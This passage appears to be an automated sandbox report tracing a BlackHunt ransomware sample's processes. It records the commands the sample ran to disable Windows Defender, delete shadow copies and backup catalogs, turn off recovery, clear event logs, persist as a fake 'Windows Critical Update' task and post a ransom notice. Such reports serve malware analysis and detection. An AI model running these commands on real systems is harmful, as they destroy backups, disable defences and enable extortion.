PID 5000 wrote to memory of 1856 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 132 PID 5000 wrote to memory of 2344 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 130 PID 5000 wrote to memory of 2344 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 130 PID 5000 wrote to memory of 2792 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 118 PID 5000 wrote to memory of 2792 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 118 PID 5000 wrote to memory of 1488 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 121 PID 5000 wrote to memory of 1488 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 121 PID 5000 wrote to memory of 1828 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 129 PID 5000 wrote to memory of 1828 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 129 PID 5000 wrote to memory of 4484 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 123 PID 5000 wrote to memory of 4484 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 123 PID 5000 wrote to memory of 4336 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 124 PID 5000 wrote to memory of 4336 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 124 PID 5000 wrote to memory of 1432 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 134 PID 5000 wrote to memory of 1432 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 134 PID 1580 wrote to memory of 1188 1580 cmd.exe 137 PID 1580 wrote to memory of 1188 1580 cmd.exe 137 PID 1908 wrote to memory of 2212 1908 cmd.exe 135 PID 1908 wrote to memory of 2212 1908 cmd.exe 135 PID 5000 wrote to memory of 3436 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 142 PID 5000 wrote to memory of 3436 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 142 PID 5000 wrote to memory of 3284 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 138 PID 5000 wrote to memory of 3284 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 138 PID 5000 wrote to memory of 1104 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 139 PID 5000 wrote to memory of 1104 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 139 PID 5000 wrote to memory of 4516 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 145 PID 5000 wrote to memory of 4516 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 145 PID 5000 wrote to memory of 4620 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 144 PID 5000 wrote to memory of 4620 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 144 PID 5000 wrote to memory of 2144 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 148 PID 5000 wrote to memory of 2144 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 148 PID 5000 wrote to memory of 4540 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 147 PID 5000 wrote to memory of 4540 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 147 PID 5000 wrote to memory of 4648 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 150 PID 5000 wrote to memory of 4648 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 150 PID 5000 wrote to memory of 4744 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 152 PID 5000 wrote to memory of 4744 5000 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe 152 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe"C:\Users\Admin\AppData\Local\Temp\946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:5000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:4612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:5124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:4728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:5184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:4684
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:5332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:868
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:5464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:876
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:5528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:5568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:3372
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:7668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:4408
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:5576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:312
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:6744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:6404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1488
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:6044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:8296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4336
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:6112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1828
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:8272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:8292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:1856
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:10364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4400
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:6244
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1432
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:8232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3284
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:10284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1104
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:8392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3436
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:8308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:5772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:5848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4540
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:7648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2144
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:13720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:17004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe" /F2⤵PID:4744
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\946682750441f0efdef0a2331d9b03bba0414871a9dec2a93c3f3102f6e5439b.exe" /F3⤵
- Creates scheduled task(s)
PID:11236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:400
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:11712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3036
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5168
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:9392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:5252
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:5884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5356
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:13680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5420
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:9288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5404
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:10308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5484
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:9436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5560
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:10324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5552
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:12476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:17404
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:17384
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:6028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:17312
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:17556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:17528
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:5396
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:17476
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:17644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:17508
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:17896
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:17888
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:18080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:17668
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:5844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:19656
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:7104
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:6912
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:18388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:18284
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:18344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:18216
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:5880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:18156
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:18328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:18164
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:7364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:18000
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:7372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:14244
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:8012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:5816
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
